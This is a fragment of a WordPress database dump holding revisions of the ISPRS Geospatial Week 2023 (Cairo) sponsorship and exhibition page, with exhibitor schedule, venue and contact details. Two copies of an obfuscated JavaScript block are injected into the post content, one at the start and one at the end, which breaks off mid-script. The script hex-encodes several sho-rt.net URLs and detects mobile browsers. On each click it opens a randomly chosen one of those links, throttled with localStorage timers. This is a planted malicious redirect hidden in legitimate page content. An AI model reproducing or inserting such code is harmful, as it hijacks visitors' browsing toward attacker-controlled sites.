_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-02-04 06:16:25','2023-02-04 06:16:25','',2920,'https://gsw2023.com/?p=3754',0,'revision','',0),
(3755,1,'2023-02-04 06:17:25','2023-02-04 06:17:25','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</p>\n<p>&nbsp;</p>\n<p>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</p>\n<p>of dedicated workshops. More information regarding ISPRS can be found at:</p>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<p>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</p>\n<p>&nbsp;</p>\n<p>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</p>\n<p>&nbsp;</p>\n<p>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</p>\n<h5></h5>\n<p>The GSW2023 Organizing Committee.[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><span style=\"font-size: 12pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3654\" img_size=\"1600x2000\"][vc_column_text]</p>\n<h5><strong>Please note that there is a 10% discount for ISPRS Sustaining Members.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a></u>)</p>\n<p><span style=\"font-size: 12pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<h6><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h6>\n<h5></h5>\n<h5><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5><strong>Tel :(+203) 5497598</strong></h5>\n<h5><b>Fax:(+203) <strong>5497598</strong></b></h5>\n<p>&nbsp;</p>\n<p><strong>Main Campus</strong></p>\n<p><strong> Alexandria, </strong><strong>Miami </strong><strong>Campus</strong></p>\n<p><strong>P.O. Box 1029 -Gamal Abdelnaser st. </strong><strong>-Miami </strong></p>\n<p><strong>Tel :(+203) 5565429/ 5506042</strong></p>\n<p><b>Fax:(+203) 5487786/ 5506042  </b></p>\n<p>&nbsp;</p>\n<p><strong>Alexandria, </strong><strong>Abu kir Campus</strong></p>\n<p><strong>Tel :(+203) 5622366/ 5622388</strong></p>\n<p><b>Fax:(+203) 5610950</b>[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial Day</strong></h5>\n<h5><strong>Exhibition Setup</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 3</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>12:00-17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition Opening</strong></h5>\n<h5><strong>Welcome Reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 4</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 17:00</strong></h5>\n<h5><strong>18:00 – 20:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Exhibitors’ reception</strong></h5>\n</td>\n</tr>\n<tr>\n<td width=\"170\">\n<h5><strong>September 5</strong></h5>\n</td>\n<td width=\"189\">\n<h5></h5>\n<h5><strong>9:00 – 15:00</strong></h5>\n<h5><strong>15:00 – 18:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5></h5>\n<h5><strong>Exhibition</strong></h5>\n<h5><strong>Dismantle Exhibition</strong></h5>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: justify; color: black;\"><span style=\"font-size: 12pt;\"><strong>The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</strong></span></p>\n<p>&nbsp;</p>\n<h5><strong>INFORMATION</strong></h5>\n<p><strong>For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact<a href=\"mailto:elsheimy@ucalgary.ca\"> the organizing committee by mail (elsheimy@ucalgary.ca</a> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u></strong> ).[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 